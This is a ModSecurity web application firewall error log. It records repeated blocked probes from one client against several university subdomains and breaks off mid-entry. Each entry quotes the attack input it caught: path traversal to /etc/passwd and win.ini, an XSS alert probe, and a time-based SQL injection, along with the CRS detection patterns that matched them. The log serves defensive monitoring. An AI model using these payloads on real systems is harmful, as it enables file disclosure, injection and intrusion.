[Tue Aug 29 11:48:28.212359 2023] [:error] [pid 2360] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./ found within ARGS:f1: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14nMCo-f0AAAk4IkMAAAAf"]
[Tue Aug 29 11:48:28.550514 2023] [:error] [pid 2375] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./ found within ARGS:f1: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14nMCo-f0AAAlHQoIAAAAm"]
[Tue Aug 29 11:48:31.500493 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:graph: usedMemory</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/monitoring"] [unique_id "ZO14n8Co-f0AAAkqHsAAAAAM"]
[Tue Aug 29 11:48:31.653516 2023] [:error] [pid 2349] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:graph: usedMemory</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/monitoring"] [unique_id "ZO14n8Co-f0AAAktzFUAAAAP"]
[Tue Aug 29 11:48:31.685122 2023] [:error] [pid 2348] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:graph: usedMemory</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/monitoring"] [unique_id "ZO14n8Co-f0AAAkskr8AAAAN"]
[Tue Aug 29 11:48:31.753592 2023] [:error] [pid 2362] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:graph: usedMemory</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/monitoring"] [unique_id "ZO14n8Co-f0AAAk6PBgAAAAh"]
[Tue Aug 29 11:48:31.787244 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:graph: usedMemory</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/monitoring"] [unique_id "ZO14n8Co-f0AAAj12HIAAAAa"]
[Tue Aug 29 11:48:32.364310 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:data[User][username]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:data[User][username]: data[User][username]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/users/login"] [unique_id "ZO14oMCo-f0AAAkyx8kAAAAW"]
[Tue Aug 29 11:48:32.372522 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:data[User][username]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:data[User][username]: data[User][username]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/users/login"] [unique_id "ZO14oMCo-f0AAAk1w6cAAAAY"]
[Tue Aug 29 11:48:32.373586 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:graph: usedMemory</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/monitoring"] [unique_id "ZO14oMCo-f0AAAkAMIQAAAAU"]
[Tue Aug 29 11:48:33.361153 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ocCo-f0AAAkleykAAAAD"]
[Tue Aug 29 11:48:33.431202 2023] [:error] [pid 2345] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ocCo-f0AAAkpFZEAAAAI"]
[Tue Aug 29 11:48:33.435774 2023] [:error] [pid 2362] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ocCo-f0AAAk6PBsAAAAh"]
[Tue Aug 29 11:48:33.437940 2023] [:error] [pid 2375] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ocCo-f0AAAlHQoYAAAAm"]
[Tue Aug 29 11:48:33.457553 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ocCo-f0AAAj12HYAAAAa"]
[Tue Aug 29 11:48:34.419484 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14osCo-f0AAAlUldcAAAA0"]
[Tue Aug 29 11:48:35.349045 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:path: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/pacs/nocache.php"] [unique_id "ZO14o8Co-f0AAAj12HkAAAAa"]
[Tue Aug 29 11:48:35.353266 2023] [:error] [pid 2349] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:path: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/pacs/nocache.php"] [unique_id "ZO14o8Co-f0AAAktzF0AAAAP"]
[Tue Aug 29 11:48:35.355316 2023] [:error] [pid 2377] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:path: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/pacs/nocache.php"] [unique_id "ZO14o8Co-f0AAAlJmaYAAAAo"]
[Tue Aug 29 11:48:35.359304 2023] [:error] [pid 2362] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14o8Co-f0AAAk6PCAAAAAh"]
[Tue Aug 29 11:48:35.369165 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:path: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/pacs/nocache.php"] [unique_id "ZO14o8Co-f0AAAkAMIsAAAAU"]
[Tue Aug 29 11:48:35.382145 2023] [:error] [pid 2389] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14o8Co-f0AAAlV8BMAAAA1"]
[Tue Aug 29 11:48:35.404097 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:path: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pacs/nocache.php"] [unique_id "ZO14o8Co-f0AAAklezIAAAAD"]
[Tue Aug 29 11:48:35.425186 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14o8Co-f0AAAlUldwAAAA0"]
[Tue Aug 29 11:48:35.436560 2023] [:error] [pid 2373] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14o8Co-f0AAAlFH5oAAAAk"]
[Tue Aug 29 11:48:35.440649 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14o8Co-f0AAAkAMI4AAAAU"]
[Tue Aug 29 11:48:36.368701 2023] [:error] [pid 2358] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:comment: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO14pMCo-f0AAAk2KXIAAAAb"]
[Tue Aug 29 11:48:36.414449 2023] [:error] [pid 2377] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:path: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/pacs/nocache.php"] [unique_id "ZO14pMCo-f0AAAlJmakAAAAo"]
[Tue Aug 29 11:48:36.446471 2023] [:error] [pid 2380] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14pMCo-f0AAAlM8iEAAAAs"]
[Tue Aug 29 11:48:37.360442 2023] [:error] [pid 2389] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:comment: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] 